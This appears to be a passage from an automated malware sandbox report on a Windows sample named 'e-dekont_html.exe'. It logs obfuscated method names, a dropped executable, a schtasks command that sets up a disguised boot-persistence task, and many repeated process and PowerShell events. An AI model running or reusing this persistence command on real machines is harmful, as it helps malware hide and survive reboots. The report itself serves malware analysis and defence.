                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, MedAUjputEsyGF6Pt2.csHigh entropy of concatenated method names: 'q6XIlSBqd7', 'MVHIcPD4Gi', 'U7hIgn2WAh', 'KHAIHba9gg', 'sSHIoiB4dU', 'kGSI8ONaPq', 'kFO32ghrgCraat08u9', 'OUFu9fSYJLrg7ISGen', 'I7xII9ZbTn', 'dIlIxpMPBp'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Ujlk6mRFBEMALBcm88.csHigh entropy of concatenated method names: 'C8owgd2QKr', 'vjAwH2uxEY', 'ToString', 'k9wwVXVLwt', 'CwCwNFjD8t', 'DHdwLIc3i5', 'JLmwbi5SYi', 'KvDwTcl0tS', 'UE1wliGhqb', 't3TwcmQdP3'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, e9ggWKPr3PnVM3SHiB.csHigh entropy of concatenated method names: 'b96bZrqFyP', 'DJObsI7arW', 'UGXLvnvwLt', 'dTGLhYdnbX', 'KamLnuh7eb', 'tY9Lf6TOyt', 'VI1L1NOJZZ', 'EWJLF3f3U8', 'a4ZLSOvrMU', 'EgwL97aJrv'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, n1sl0teDvd0Pxu4cMf.csHigh entropy of concatenated method names: 'ONfMoGy7U7', 'eAwMw6yHOS', 'H4AMMl9euG', 'mcjMQj3TZS', 'RuiMm62VR8', 'F4EMrY7Khg', 'Dispose', 'yLL7VNfD4L', 'V8n7NVdUUH', 'Ix57LG9RDN'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, nbb8QnNbmnkODG7y8r.csHigh entropy of concatenated method names: 'Dispose', 'R0PItxu4cM', 'tfl2WQQMiT', 'Rw2V43bvFc', 'JwXIDhNVJu', 'DK6IzYV3s3', 'ProcessDialogKey', 'KFQ2OjVyso', 'bAQ2Iu0dvv', 'mLr22Sn6yt'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, tjVysot2AQu0dvvgLr.csHigh entropy of concatenated method names: 'PZCMJH3mCp', 'yVkMW9lYgy', 'i1PMviYlRY', 'n8AMh0WLfW', 'AcBMnLMK4c', 'IeUMfXrdEF', 'T7aM1AVO88', 'SuZMFWsvcw', 'dySMSwlTQg', 'C55M99a6XH'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, OCmNtUG5tcQNK8ZiJ1.csHigh entropy of concatenated method names: 'EUFo9FiQZb', 'vATo0QSAXG', 'hv5oGC75bl', 'Pnood40qhE', 'OaXoWUVYwf', 'xckovfUA41', 'fI2ohgJC9o', 'AxlonaMGmE', 'ocZofEudee', 'ORco1B0Nv3'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, FoopVYA7hn2WAhfHAb.csHigh entropy of concatenated method names: 'hA5L4AoLoV', 'AgLLX2Yltt', 'UcEL6gynYa', 'OkHLAiiSkg', 'eHNLoi2yEw', 'HPCL8nPk0q', 'fQ0Lwum5Fh', 'NR4L7v1SZQ', 'SgZLMLXkLk', 'IsEL3n0v6B'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Mn6yt0DkxrQKJDFWUY.csHigh entropy of concatenated method names: 'Yf93Lygxmv', 'sU73bsVAn3', 'WkP3TbCjPe', 'JUj3lvDfns', 'CaT3MQcYfm', 'nkZ3c63hIC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.csHigh entropy of concatenated method names: 'iBQxaqjlfC', 'Sl5xV02clK', 'nRqxNQ7HqI', 'IhExLlPEY7', 'hJixbG7I7K', 'clCxT0311H', 'SRKxlgDjlQ', 'iOKxckB1Yl', 'fiUxqBXFuy', 'FXPxgYQUeI'
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
